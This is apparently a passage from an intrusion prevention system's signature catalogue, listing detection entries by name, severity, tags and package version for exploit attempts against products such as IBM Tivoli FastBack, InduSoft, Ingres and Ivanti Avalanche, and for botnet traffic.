Tags: Any Operating System, Any Hardware, IBM Tivoli Storage Manager FastBack, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-644-5211
Last changed: sgpkg-ips-1865-5242
Vulnerability: IBM-Tivoli-Storage-Manager-Fastback-Mount-Opcode-0x09-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Mount-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in IBM Tivoli Storage Manager FastBack detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Tivoli Storage Manager FastBack, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-649-5211
Last changed: sgpkg-ips-653-5211
Vulnerability: IBM-Tivoli-Storage-Manager-Fastback-Mount-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Mount-Vault-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in IBM Tivoli Storage Manager FastBack detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Tivoli Storage Manager FastBack, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-653-5211
Last changed: sgpkg-ips-653-5211
Vulnerability: IBM-Tivoli-Storage-Manager-Fastback-Mount-Vault-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Server-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in IBM Tivoli Storage Manager FastBack detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Tivoli Storage Manager FastBack, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-913-5242
Last changed: sgpkg-ips-913-5242
Vulnerability: IBM-Tivoli-Storage-Manager-Fastback-Server-Buffer-Overflow
Description:
Back to top

Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Server-Buffer-Overflow-CVE-2015-1929

About this situation: An attempt to exploit a vulnerability in IBM Tivoli Storage Manager FastBack detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Tivoli Storage Manager FastBack, CVE2015, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1865-5242
Last changed: sgpkg-ips-1865-5242
Vulnerability: IBM-Tivoli-Storage-Manager-Fastback-Server-Buffer-Overflow-CVE-2015-1929
Description:
Back to top

Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1301-Format-String-Vulnerability

About this situation: An attempt to exploit a vulnerability in IBM Tivoli Storage Manager FastBack detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Tivoli Storage Manager FastBack, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-1060-5242
Vulnerability: IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1301-Format-String-Vuln
Description:
Back to top

Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1329-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in IBM Tivoli Storage Manager FastBack detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Tivoli Storage Manager FastBack, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-710-5211
Last changed: sgpkg-ips-1761-5242
Vulnerability: IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1329-Buffer-Overflow
Description:
Back to top

Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1329-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in IBM Tivoli Storage Manager FastBack detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Tivoli Storage Manager FastBack, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-705-5211
Last changed: sgpkg-ips-1399-5242
Vulnerability: IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1329-Directory-Traversal
Description:
Back to top

Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1330-Command-Injection

About this situation: An attempt to exploit a vulnerability in IBM Tivoli Storage Manager FastBack detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Tivoli Storage Manager FastBack, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-1060-5242
Vulnerability: IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1330-Command-Injection
Description:
Back to top

Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1331-Rmdir-Command-Injection

About this situation: An attempt to exploit a vulnerability in IBM Tivoli Storage Manager FastBack detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Tivoli Storage Manager FastBack, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-693-5211
Last changed: sgpkg-ips-693-5211
Vulnerability: IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1331-Rmdir-Command-Injection
Description:
Back to top

Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1332-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in IBM Tivoli Storage Manager FastBack detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Tivoli Storage Manager FastBack, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-695-5211
Last changed: sgpkg-ips-695-5211
Vulnerability: IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1332-Buffer-Overflow
Description:
Back to top

Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-1335-Format-String-Vulnerability

About this situation: An attempt to exploit a vulnerability in IBM Tivoli Storage Manager FastBack detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Tivoli Storage Manager FastBack, CVE2015, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-720-5211
Last changed: sgpkg-ips-720-5211
Vulnerability: IBM-Tivoli-Storage-Fastback-Server-Opcode-1335-Format-String-Vulnerability
Description:
Back to top

Generic_CS-IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-4115-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in IBM Tivoli Storage Manager FastBack detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Tivoli Storage Manager FastBack, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-726-5211
Last changed: sgpkg-ips-739-5211
Vulnerability: IBM-Tivoli-Storage-Manager-Fastback-Server-Opcode-4115-Buffer-Overflow
Description:
Back to top

Generic_CS-ICONICS-Genesis-Denial-Of-Service

About this situation: A vulnerability in ICONICS Genesis detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, ICONICS Genesis, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Vulnerability: ICONICS-Genesis-Denial-of-Service
Description:
Back to top

Generic_CS-ICONICS-Genesis-Integer-Overflow

About this situation: A vulnerability in ICONICS Genesis detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, ICONICS Genesis, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Vulnerability: ICONICS-Genesis-Integer-Overflow
Description:
Back to top

Generic_CS-IGEL-OS-Secure-VNC-Terminal-Command-Injection

About this situation: An attempt to exploit a vulnerability in IGEL OS detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, IGEL OS, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1364-5242
Last changed: sgpkg-ips-1364-5242
Vulnerability: IGEL-OS-Secure-VNC-Terminal-Command-Injection
Description:
Back to top

Generic_CS-IGSS-DataServer-Denial-Of-Service

About this situation: IGSSdataServer.exe denial of service.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, IGSS Server, Windows not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-628-5211
Last changed: sgpkg-ips-628-5211
Vulnerability: IGSS-DataServer-Denial-Of-Service
Description:
Back to top

Generic_CS-IGSS-ODBC-Server-Denial-Of-Service

About this situation: IGSS odbc scada server denial of service.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, IGSS Server, Windows not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-628-5211
Last changed: sgpkg-ips-628-5211
Vulnerability: IGSS-ODBC-Server-Denial-Of-Service
Description:
Back to top

Generic_CS-Indusoft-CEServer-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in InduSoft CEServer detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, InduSoft CEServer, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-608-5211
Vulnerability: Indusoft-CEServer-Buffer-Overflow
Description:
Back to top

Generic_CS-Indusoft-Web-Studio-Remote-Agent-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in InduSoft Web Studio detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, InduSoft Web Studio, CVE2011, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-427-4219
Last changed: sgpkg-ips-446-4219
Vulnerability: Indusoft-Web-Studio-Remote-Agent-Buffer-Overflow
Description:
Back to top

Generic_CS-Indusoft-Web-Studio-Unauthenticated-Insecure-Remote-Operations

About this situation: An attempt to exploit a vulnerability in InduSoft Web Studio detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, InduSoft Web Studio, CVE2011, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-431-4219
Last changed: sgpkg-ips-1060-5242
Vulnerability: Indusoft-Web-Studio-Unauthenticated-Insecure-Remote-Operations
Description:
Back to top

Generic_CS-Ingres-Database-Communications-Server-Component-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Ingres Ingres Database detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Ingres Database, CVE2007, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Ingres-Database-Communications-Server-Component-Heap-Buffer-Overflow
Description:
Back to top

Generic_CS-Ingres-Database-Iidbms-Heap-Overflow

About this situation: An potential attempt to exploit a vulnerability in Ingres Ingres Database detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Ingres Database, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-286-4219
Last changed: sgpkg-ips-286-4219
Vulnerability: Ingres-Database-Iidbms-Heap-Overflow
Description:
Back to top

Generic_CS-Ingres-Database-Iidbms-Heap-Overflow-2

About this situation: An attempt to exploit a vulnerability in Ingres Ingres Database detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Ingres Database, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-286-4219
Last changed: sgpkg-ips-286-4219
Vulnerability: Ingres-Database-Iidbms-Heap-Overflow
Description:
Back to top

Generic_CS-Ingres-Database-Iidbms-Heap-Overflow-3

About this situation: An attempt to exploit a vulnerability in the Ingres Database detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Ingres Database, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-689-5211
Last changed: sgpkg-ips-689-5211
Vulnerability: Ingres-Database-Iidbms-Heap-Overflow-3
Description:
Back to top

Generic_CS-Injector-2-Traffic

About this situation: A suspicious traffic pattern detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-702-5211
Vulnerability: Win32.Trojan.Injector-2-Botnet
Description:
Back to top

Generic_CS-Intelligent-Management-Center-Dbman-Restartdb-Command-Injection

About this situation: An attempt to exploit a vulnerability in HP Intelligent Management Center detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, CVE2017, Any Operating System not specific, HP Intelligent Management Center not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-938-5242
Last changed: sgpkg-ips-942-5242
Vulnerability: HPE-Intelligent-Management-Center-Dbman-Restartdb-Command-Injection
Description:
Back to top

Generic_CS-IOServer-OPC-Server-DoS

About this situation: A vulnerability in IOServer OPC Server
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, IOServer, Any Operating System not specific, Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-610-5211
Vulnerability: IOServer-OPC-Server-DoS
Description:
Back to top

Generic_CS-IRC-Itlebot-Activity

About this situation: IRC Itlebot activity detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: IRC-Itlebot-Malware
Description:
Back to top

Generic_CS-IRC-Mocbot-Activity

About this situation: IRC-Mocbot Activity
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Mocbot-Botnet
Description:
Back to top

Generic_CS-IRC-Ngrbot-Activity-Detected

About this situation: NGRBot activity detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-618-5211
Vulnerability: Ngrbot
Description:
Back to top

Generic_CS-IRC-Scan-Activity

About this situation: Detected IRC SCAN activity
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: IRC-Scan-Activity
Description:
Back to top

Generic_CS-IRIX-lpsched-Command-Execution

About this situation: An attempt to exploit an IRIX lpsched Command Execution vulnerability detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Irix, CVE2001, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-775-5211
Last changed: sgpkg-ips-775-5211
Vulnerability: IRIX-lpsched-Command-Execution
Description:
Back to top

Generic_CS-ISC-Bind-Rndc-Control-Channel-Assertion-Failure-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in ISC BIND detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, ISC BIND, CVE2016, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-755-5211
Last changed: sgpkg-ips-755-5211
Vulnerability: ISC-Bind-Rndc-Control-Channel-Assertion-Failure-Denial-Of-Service
Description:
Back to top

Generic_CS-ISC-Bind-Rndc-Control-Channel-Assertion-Failure-DoS

About this situation: An attempt to exploit a vulnerability in ISC BIND detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, ISC BIND, CVE2017, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-892-5242
Last changed: sgpkg-ips-894-5242
Vulnerability: ISC-Bind-Rndc-Control-Channel-Assertion-Failure-Denial-Of-Service-CVE-2017-3138
Description:
Back to top

Generic_CS-iSCSI-Login-Request

About this situation: An iSCSI Login Request detected
Context: TCP Client Stream Unknown
Severity: 1
Tags: Windows 2008 R2, Windows 2012, Windows 2008, Windows 2012 R2, Any Hardware, MS2014-05, CVE2014, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-587-5211
Last changed: sgpkg-ips-587-5211
Vulnerability: Microsoft-Windows-iSCSI-Target-CVE-2014-0255-Denial-Of-Service
Description:
Back to top

Generic_CS-iSCSI-target-Multiple-Implementations-Buffer-Overflow

About this situation: Attempt to exploit buffer overflow vulnerability in iSCSI target detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, iSCSI target, CVE2010, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-321-4219
Last changed: sgpkg-ips-321-4219
Vulnerability: iSCSI-target-Multiple-Implementations-Buffer-Overflow
Description:
Back to top

Generic_CS-iSCSI-target-Multiple-Implementations-Format-String-Code-Execution

About this situation: An attempt to exploit a vulnerability in iSCSI target detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, iSCSI target, CVE2010, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-376-4219
Last changed: sgpkg-ips-376-4219
Vulnerability: iSCSI-target-Multiple-Implementations-Format-String-Code-Execution
Description:
Back to top

Generic_CS-Ivanti-Avalanche-Datarepository-Service-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Ivanti Avalanche detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Avalanche, CVE2021, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1440-5242
Last changed: sgpkg-ips-1440-5242
Vulnerability: Ivanti-Avalanche-Datarepository-Service-Insecure-Deserialization
Description:
Back to top

Generic_CS-Ivanti-Avalanche-Enterpriseserver-Getprofiledata-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Ivanti Avalanche detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Avalanche, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1484-5242
Last changed: sgpkg-ips-1590-5242
Vulnerability: Ivanti-Avalanche-Enterpriseserver-Getprofiledata-SQL-Injection
Description:
Back to top

Generic_CS-Ivanti-Avalanche-Enterpriseserver-Getsettings-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Ivanti Avalanche detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Avalanche, CVE2023, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1592-5242
Last changed: sgpkg-ips-1592-5242
Vulnerability: Ivanti-Avalanche-Enterpriseserver-Getsettings-Authentication-Bypass
Description:
Back to top

Generic_CS-Ivanti-Avalanche-Enterpriseserver-Service-getDisplayableTreeData-SQL-Injection

About this situation: An attempt to exploit a vulnerability in the Ivanti Avalanche EnterpriseServer service detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Avalanche, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1484-5242
Last changed: sgpkg-ips-1489-5242
Vulnerability: Ivanti-Avalanche-Enterpriseserver-Service-getDisplayableTreeData-SQL-Injection
Description:
Back to top

Generic_CS-Ivanti-Avalanche-Enterpriseserver-Service-Getprofileapplicationdata-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Ivanti Avalanche detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Avalanche, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1477-5242
Last changed: sgpkg-ips-1478-5242
Vulnerability: Ivanti-Avalanche-Enterpriseserver-Getprofileapplicationdata-SQL-Injection
Description:
Back to top

Generic_CS-Ivanti-Avalanche-Enterpriseserver-Service-Save-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Ivanti Avalanche detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Avalanche, CVE2021, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1438-5242
Last changed: sgpkg-ips-1438-5242
Vulnerability: Ivanti-Avalanche-Enterpriseserver-Service-Save-SQL-Injection
Description:
Back to top

Generic_CS-Ivanti-Avalanche-Enterpriseserver-Service-Setuser-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Ivanti Avalanche detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Avalanche, CVE2021, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1433-5242
Last changed: sgpkg-ips-1433-5242
Vulnerability: Ivanti-Avalanche-Enterpriseserver-Service-Setuser-Authentication-Bypass
Description:
Back to top

Generic_CS-Ivanti-Avalanche-Enterpriseserver-Setsettings-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Ivanti Avalanche detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Avalanche, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1482-5242
Last changed: sgpkg-ips-1482-5242
Vulnerability: Ivanti-Avalanche-Enterpriseserver-Setsettings-Authentication-Bypass
Description:
Back to top

Generic_CS-Ivanti-Avalanche-Notification-Server-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Ivanti Avalanche detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Avalanche, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1520-5242
Last changed: sgpkg-ips-1520-5242
Vulnerability: Ivanti-Avalanche-Notification-Server-Insecure-Deserialization
Description:
Back to top

Generic_CS-Ivanti-Avalanche-Printerdeviceserver-Service-Command-Injection

About this situation: An attempt to exploit a vulnerability in Ivanti Avalanche detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Avalanche, CVE2021, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1429-5242
Last changed: sgpkg-ips-1429-5242
Vulnerability: Ivanti-Avalanche-Printerdeviceserver-Service-Command-Injection
Description:
Back to top

Generic_CS-Ivanti-Avalanche-Smartdeviceserver-Uploadfile-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Ivanti Avalanche detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Avalanche, CVE2022, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1532-5242
Last changed: sgpkg-ips-1532-5242
Vulnerability: Ivanti-Avalanche-Smartdeviceserver-Uploadfile-Directory-Traversal
Description:
Back to top

Generic_CS-Ivanti-Avalanche-Statserver-Service-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Ivanti Avalanche detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Avalanche, CVE2021, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1435-5242
Last changed: sgpkg-ips-1435-5242
Vulnerability: Ivanti-Avalanche-Statserver-Service-Insecure-Deserialization
Description:
Back to top

Generic_CS-Ivanti-Avalanche-Web-File-Server-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Ivanti Avalanche detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Avalanche, CVE2022, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1498-5242
Last changed: sgpkg-ips-1498-5242
Vulnerability: Ivanti-Avalanche-Web-File-Server-Insecure-Deserialization
Description:
Back to top

Generic_CS-Ivanti-Avalanche-Web-Server-Authenticate-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Ivanti Avalanche detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Avalanche, CVE2022, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1494-5242
Last changed: sgpkg-ips-1494-5242
Vulnerability: Ivanti-Avalanche-Web-Server-Authenticate-Authentication-Bypass
Description:
Back to top

Generic_CS-Ivanti-Avalanche-Wlavalancheservice.exe-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Ivanti Avalanche detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Avalanche, CVE2023, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1627-5242
Last changed: sgpkg-ips-1781-5242
Vulnerability: Ivanti-Avalanche-Wlavalancheservice.exe-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-Ivanti-Avalanche-Wlavalancheservice.exe-Type-100-Null-Pointer-Dereference

About this situation: An attempt to exploit a vulnerability in Ivanti Avalanche detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Avalanche, CVE2024, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1781-5242
Last changed: sgpkg-ips-1781-5242
Vulnerability: Ivanti-Avalanche-Wlavalancheservice.exe-Type-100-Null-Pointer-Dereference
Description:
Back to top

Generic_CS-Ivanti-Avalanche-Wlavalancheservice.exe-Type-100-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Ivanti Avalanche detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Avalanche, CVE2023, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1684-5242
Last changed: sgpkg-ips-1684-5242
Vulnerability: Ivanti-Avalanche-Wlavalancheservice.exe-Type-100-Stack-Buffer-Overflow
Description:
Back to top

